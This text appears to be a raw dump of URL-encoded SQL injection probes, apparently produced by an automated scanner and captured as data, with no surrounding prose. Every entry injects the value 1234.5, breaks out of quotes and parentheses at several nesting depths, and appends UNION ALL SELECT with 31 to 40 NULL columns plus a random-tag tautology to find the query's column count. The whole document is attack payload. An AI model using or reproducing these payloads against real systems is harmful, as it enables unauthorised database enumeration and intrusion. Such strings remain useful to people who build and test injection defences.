1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Euhx%27%3D%27Euhx 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27ikaJ%27%3D%27ikaJ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27tSoW%27%3D%27tSoW 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27LyHT%27%3D%27LyHT 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27fibI%27%3D%27fibI 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27rTmI%27%3D%27rTmI 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27suSF%27%3D%27suSF 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27Odva%27%3D%27Odva 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27fBTv%27%3D%27fBTv 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27wgWe%27%3D%27wgWe 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27nRKF%27%3D%27nRKF 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ybXp%27%3D%27ybXp 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27vYHf%27%3D%27vYHf 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27BbSn%27%3D%27BbSn 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27GOOc%27%3D%27GOOc 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27EtBr%27%3D%27EtBr 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27bNeA%27%3D%27bNeA 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27erjt%27%3D%27erjt 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27YLlQ%27%3D%27YLlQ 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27igTM%27%3D%27igTM 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27jkoh%27%3D%27jkoh 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27dHKU%27%3D%27dHKU 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27aGZu%27%3D%27aGZu 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27wpBD%27%3D%27wpBD 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27jcIB%27%3D%27jcIB 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27kXvQ%27%3D%27kXvQ 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Muay%27%3D%27Muay 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Kbbf%27%3D%27Kbbf 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27rjbG%27%3D%27rjbG 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27xqqs%27%3D%27xqqs 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27TZue%27%3D%27TZue 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27KVpZ%27%3D%27KVpZ 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Bcvs%27%3D%27Bcvs 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Oidj%27%3D%27Oidj 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27GTbg%27%3D%27GTbg 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27Wdwt%27%20LIKE%20%27Wdwt 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27rQXO%27%20LIKE%20%27rQXO 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27gwxF%27%20LIKE%20%27gwxF 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27OnkY%27%20LIKE%20%27OnkY 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27PkiF%27%20LIKE%20%27PkiF 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27qwXJ%27%20LIKE%20%27qwXJ 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27SSdM%27%20LIKE%20%27SSdM 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27fYfN%27%20LIKE%20%27fYfN 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27FNSK%27%20LIKE%20%27FNSK 